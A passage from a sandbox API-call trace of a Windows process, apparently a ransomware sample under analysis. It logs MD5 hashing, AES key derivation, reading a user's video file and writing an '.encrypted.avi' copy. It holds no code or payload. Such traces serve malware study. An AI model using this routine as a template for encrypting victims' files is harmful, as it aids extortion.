lpMsg=0x6aed6c) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.775] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.775] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.775] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.775] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.775] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.775] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.776] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.776] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.776] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.776] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.776] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.776] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.777] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.777] CryptHashData (hHash=0x7c2240, pbData=0x7c50e0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.777] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.777] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0041.777] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.777] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0041.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0041.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.778] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.778] CryptDestroyHash (hHash=0x7c2240) returned 1 [0041.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0041.778] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tvp.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.778] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.778] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0041.781] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tvp.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.783] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.783] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xb274, lpOverlapped=0x0) returned 1 [0041.785] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb274) returned 0xac2018 [0041.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0041.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb274) returned 0xacd298 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.787] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.787] RtlAllocateHeap 